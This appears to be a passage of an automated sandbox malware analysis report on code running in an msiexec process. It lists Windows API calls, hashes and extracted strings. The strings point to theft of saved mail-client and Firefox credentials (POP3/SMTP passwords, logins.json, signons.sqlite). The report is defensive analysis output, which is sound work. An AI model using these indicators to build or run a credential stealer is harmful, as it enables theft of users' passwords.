                                                                            control_flow_graph 445 404734-40474a call 404785 LoadLibraryA 448 40474c-404762 GetProcAddress 445->448 449 40476e-404778 445->449 448->449 450 404764 448->450 451 404781-404784 449->451 452 40477a-40477c call 404785 449->452 450->449 452->451
                                                                            APIs
                                                                              • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                            • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID:
                                                                            • API String ID: 145871493-0
                                                                            • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                            • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                            • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                            • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                            Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                              • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                              • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                              • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfile$StringWrite_itoamemset
                                                                            • String ID:
                                                                            • API String ID: 4165544737-0
                                                                            • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                            • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                            • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                            • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                            Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                            • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                            • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                            • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                            Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                            • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                            • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                            • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                            Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                            • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                            • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                            • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                            Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: CloseFind
                                                                            • String ID:
                                                                            • API String ID: 1863332320-0
                                                                            • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                            • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                            • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                            • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                            Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                            • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                            • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                            • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

                                                                            Non-executed Functions

                                                                            Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileString_mbscmpstrlen
                                                                            • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                            • API String ID: 3963849919-1658304561
                                                                            • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                            • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                            • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                            • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                            Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                              • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                              • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                              • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                              • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                              • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                            • memset.MSVCRT ref: 0040E5B8
                                                                            • memset.MSVCRT ref: 0040E5CD
                                                                            • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                            • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                            • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                            • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                            • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                            • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                            • memset.MSVCRT ref: 0040E6B5
                                                                            • memset.MSVCRT ref: 0040E6CC
                                                                              • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                              • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                            • memset.MSVCRT ref: 0040E736
                                                                            • memset.MSVCRT ref: 0040E74F
                                                                            • sprintf.MSVCRT ref: 0040E76D
                                                                            • sprintf.MSVCRT ref: 0040E788
                                                                            • _strcmpi.MSVCRT ref: 0040E79E
                                                                            • _strcmpi.MSVCRT ref: 0040E7B7
                                                                            • _strcmpi.MSVCRT ref: 0040E7D3
                                                                            • memset.MSVCRT ref: 0040E858
                                                                            • sprintf.MSVCRT ref: 0040E873
                                                                            • _strcmpi.MSVCRT ref: 0040E889
                                                                            • _strcmpi.MSVCRT ref: 0040E8A5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                            • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                            • API String ID: 4171719235-3943159138
                                                                            • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                            • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                            • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                            • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                            Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                            • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                            • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                            • GetWindowRect.USER32(?,?), ref: 00410487
                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                            • GetDC.USER32 ref: 004104E2
                                                                            • strlen.MSVCRT ref: 00410522
                                                                            • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                            • ReleaseDC.USER32(?,?), ref: 00410580
                                                                            • sprintf.MSVCRT ref: 00410640
                                                                            • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                            • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                            • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                            • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                            • GetClientRect.USER32(?,?), ref: 004106DD
                                                                            • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                            • GetClientRect.USER32(?,?), ref: 00410737
                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                            • String ID: %s:$EDIT$STATIC
                                                                            • API String ID: 1703216249-3046471546
                                                                            • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                            • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                            • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                            • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                            Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004024F5
                                                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                            • _mbscpy.MSVCRT(?,00000000,?,?,?,679D7B60,?,00000000), ref: 00402533
                                                                            • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscpy$QueryValuememset
                                                                            • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                            • API String ID: 168965057-606283353
                                                                            • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                            • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                            • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                            • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                            Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                            • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                            • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                            • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                            • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                            • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                            • DeleteObject.GDI32(?), ref: 00401226
                                                                            • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                            • ShowWindow.USER32(00000000), ref: 00401253
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                            • ShowWindow.USER32(00000000), ref: 00401262
                                                                            • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                            • memset.MSVCRT ref: 0040128E
                                                                            • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                            • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                            • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                            • String ID:
                                                                            • API String ID: 2998058495-0
                                                                            • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                            • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                            • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                            • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                            Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                            • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                            • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                            • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                            • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                            • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                            • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcmp$memcpy
                                                                            • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                            • API String ID: 231171946-2189169393
                                                                            • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                            • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                            • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                            • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                            Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                            • API String ID: 633282248-1996832678
                                                                            • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                            • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                            • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                            • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                            Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: sprintf$memset$_mbscpy
                                                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                            • API String ID: 3402215030-3842416460
                                                                            • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                            • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                            • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                            • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                            Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                              • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                              • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                              • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                              • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                              • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                              • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                              • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                            • strlen.MSVCRT ref: 0040F139
                                                                            • strlen.MSVCRT ref: 0040F147
                                                                            • memset.MSVCRT ref: 0040F187
                                                                            • strlen.MSVCRT ref: 0040F196
                                                                            • strlen.MSVCRT ref: 0040F1A4
                                                                            • memset.MSVCRT ref: 0040F1EA
                                                                            • strlen.MSVCRT ref: 0040F1F9
                                                                            • strlen.MSVCRT ref: 0040F207
                                                                            • _strcmpi.MSVCRT ref: 0040F2B2
                                                                            • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                            • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                            • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                            • API String ID: 2003275452-3138536805
                                                                            • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                            • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                            • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                            • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                            Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040C3F7
                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                            • strrchr.MSVCRT ref: 0040C417
                                                                            • _mbscat.MSVCRT ref: 0040C431
                                                                            • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                            • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                            • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                            • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                            • API String ID: 1012775001-1343505058
                                                                            • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
